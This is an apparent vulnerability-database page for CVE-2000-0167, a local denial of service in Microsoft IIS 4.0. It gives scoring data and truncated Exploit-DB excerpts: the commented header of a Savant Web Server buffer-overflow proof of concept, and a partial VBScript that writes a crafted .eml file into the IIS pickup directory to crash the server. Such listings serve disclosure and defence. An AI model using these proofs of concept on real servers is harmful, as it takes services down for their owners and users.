CVE-2000-0167
published 2000-02-15CVE-2000-0167: IIS Inetinfo.exe allows local users to cause a denial of service by creating a mail file with a long name and a .txt.eml extension in the pickup directory.
PriorityP410low2.1CVSS 2.0
AVLACLAuNCNINAP
EXPLOIT
EPSS
2.71%
84.1th percentile
IIS Inetinfo.exe allows local users to cause a denial of service by creating a mail file with a long name and a .txt.eml extension in the pickup directory.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_information_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Michael Lamont Savant Web Server 2.1/3.0 - Remote Buffer Overflow
exploitdb·2000-07-03
CVE-2000-0641 Michael Lamont Savant Web Server 2.1/3.0 - Remote Buffer Overflow
Michael Lamont Savant Web Server 2.1/3.0 - Remote Buffer Overflow
---
source: https://www.securityfocus.com/bid/1453/info
A buffer overflow exists in the Savant Web Server. It is possible to exploit this overflow by sending an unusually long GET request to the server.
/* The MDMA Crew's proof-of-concept code for the buffer overflow in Savant
* Written by Wizdumb
*
* The overflow occurs when the server recieves too many headers in the GET
* request. The results of the attack look something like...
*
* SAVANT caused an invalid page fault
* in module KERNEL32.DLL at 015f:bff87eb5.
*
* Registers:
*
* EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010212
* EBX=0119ff90 SS=0167 ESP=0109ffc4 EBP=010a0030
* ECX=010a01e4 DS=0167 ESI=8162f198 FS=20f7
* EDX=bff76859 ES=0167 EDI=010a020c GS=0000
*
* B
Exploit-DB
Microsoft IIS 4.0 - Pickup Directory Denial of Service
exploitdb·2000-02-15
CVE-2000-0167 Microsoft IIS 4.0 - Pickup Directory Denial of Service
Microsoft IIS 4.0 - Pickup Directory Denial of Service
---
source: https://www.securityfocus.com/bid/1819/info
An email with a filename consisting of over 86 characters and an extension of .txt.eml will cause Microsoft IIS to crash if placed in the \mailroot\pickup directory. The process inetinfo.exe will crash, resulting in a Dr. Watson access violation error. Restarting IIS is required in order to regain normal functionality.
' PLEASE PROVIDE YOUR PICKUP PATH HERE
Rootpath = "c:\inetpub\mailroot\pickup\"
Set fso = createobject("scripting.filesystemobject")
Thename = Createkey & fso.GetTempName & ".eml"
Set Thefile = fso.GetFolder(rootpath).CreateTextFile(TheName)
Thefile.writeline "X-Sender: [email protected]"
Thefile.writeline "X-Receiver: [email protected]"
Thefile.writeline "From: "
The
No writeups or analysis indexed.
2000-02-15
Published